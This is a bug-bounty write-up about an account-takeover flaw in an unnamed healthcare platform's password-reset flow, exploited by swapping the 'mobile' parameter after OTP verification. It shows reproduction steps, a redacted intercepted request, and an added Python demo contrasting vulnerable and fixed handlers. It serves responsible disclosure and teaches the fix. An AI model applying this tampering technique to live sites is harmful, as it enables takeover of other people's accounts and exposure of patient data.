I received a bounty of $60 for finding a critical bug in the patient management system.
2023-7-10 01:3:8 Author: infosecwriteups.com

Krishnadev P Melevila

InfoSec Write-ups

Hi hackers,

My name is Krishnadev P Melevila. To know more about me, just search “Who is Krishnadev P Melevila” on Google or ask your Google Assistant.

In my ongoing efforts to enhance the security landscape of web applications, I recently discovered a critical vulnerability on a healthcare platform. This vulnerability, which I reported on July 3rd, 2023, could potentially lead to an account takeover, posing a significant risk to patient data privacy. In this write-up, I aim to outline the details of the vulnerability while maintaining the confidentiality of the target platform.

Vulnerability Details:

Vulnerability Type: Account Takeover

Platform: Confidential

Impact Level: Critical

Risk: Patient account takeover leading to sensitive data loss

Priority: P1

Steps to Reproduce the Vulnerability:

  1. Visit the platform’s website and navigate to the relevant login section.
  2. Click on the “Forgot Password” option.
  3. Enter a valid mobile number that is already registered as a user on the platform.
  4. Enter the attacker’s own valid OTP (the one sent to the attacker’s number) and click “Submit.”
  5. Set a new password and submit the request while intercepting it using a web interceptor tool.

The Intercepted Request:

Below is an example of the intercepted request that exposes the vulnerability. Please note that specific details and target information have been redacted to ensure responsible disclosure.

[Intercepted Request]

POST [URL] HTTP/2
Host: [Host]
Cookie: [Redacted]
Content-Length: 63
Cache-Control: max-age=0
Sec-Ch-Ua: "Not:A-Brand";v="99", "Chromium";v="112"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: [Origin]
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.50 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: [Referer]
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8

mobile=[Redacted]&isdcode=91&pwd=Hello%402002&cpwd=Hello%402002

Exploitation and Impact:

It’s time to exploit:

By exploiting this vulnerability, an attacker can bypass proper authentication on the platform. The vulnerability stems from improper validation of the “mobile” parameter: the final password-reset request identifies the account by the client-supplied “mobile” value rather than by the number for which the OTP was actually verified. An attacker who completes OTP verification for their own number can therefore substitute any registered number in the intercepted request and reset that user’s password. This could result in unauthorized access to sensitive user information, including personal and private data.
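To make the root cause and the fix concrete, here is an added example (not code from the original post or from the affected platform) that models the reset flow with a vulnerable final step beside a hardened one; the user store, phone numbers, OTP value and session object are all constructed for the demo.

```python
import hmac
from dataclasses import dataclass
from typing import Optional

# Constructed in-memory user store: mobile number -> stored password.
# (A real system stores salted hashes; plain strings keep the demo short.)
USERS = {"9100000001": "victim-old-pw", "9100000002": "attacker-old-pw"}


@dataclass
class ResetSession:
    """Server-side state for one password-reset flow (hypothetical)."""
    verified_mobile: Optional[str] = None  # set only after a correct OTP


def verify_otp(session, mobile, otp, expected_otp):
    """Step 4 of the flow: the OTP issued for *this* mobile was entered."""
    if hmac.compare_digest(otp, expected_otp):
        session.verified_mobile = mobile
        return True
    return False


def reset_vulnerable(session, form):
    """Vulnerable final step: the OTP proved control of session.verified_mobile,
    but the account that gets updated is whatever 'mobile' the client sends."""
    if session.verified_mobile is None or form["pwd"] != form["cpwd"]:
        return False
    USERS[form["mobile"]] = form["pwd"]  # any registered number can be named here
    return True


def reset_fixed(session, form):
    """Hardened final step: the account comes only from the OTP-verified
    server-side state; a client-supplied 'mobile' must match or is rejected,
    and the verification is consumed so it cannot be reused."""
    if session.verified_mobile is None or form["pwd"] != form["cpwd"]:
        return False
    if form.get("mobile") not in (None, session.verified_mobile):
        return False  # tampered identifier: reject instead of obeying it
    USERS[session.verified_mobile] = form["pwd"]
    session.verified_mobile = None  # one reset per OTP verification
    return True


def demo(handler):
    """Verify the OTP for the attacker's number, then submit the final request
    with 'mobile' changed to the victim's number (mirrors the intercepted body).
    Returns the victim's stored password afterwards."""
    USERS.update({"9100000001": "victim-old-pw", "9100000002": "attacker-old-pw"})
    s = ResetSession()
    verify_otp(s, "9100000002", "483920", "483920")  # constructed OTP
    tampered = {"mobile": "9100000001", "isdcode": "91",
                "pwd": "Hello@2002", "cpwd": "Hello@2002"}
    handler(s, tampered)
    return USERS["9100000001"]
```

Running `demo(reset_vulnerable)` shows the victim’s password replaced, while `demo(reset_fixed)` leaves it untouched because the handler only ever acts on the number the OTP was verified for.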

I reported it to the affected organization, and they triaged my report in minimum time and rewarded me with a bounty of $60.

Don’t forget to follow me on Medium and other social media. Also, please give this write-up your 50 claps; that’s my inspiration to write more!!

My Instagram handle: https://instagram.com/krishnadev_p_melevila

My Twitter handle: https://twitter.com/Krishnadev_P_M

My LinkedIn handle: https://www.linkedin.com/in/krishnadevpmelevila/


Article source: https://infosecwriteups.com/i-received-a-bounty-of-60-for-finding-a-critical-bug-in-the-patient-management-system-560446c534e?source=rss----7b722bfd1b8d--bug_bounty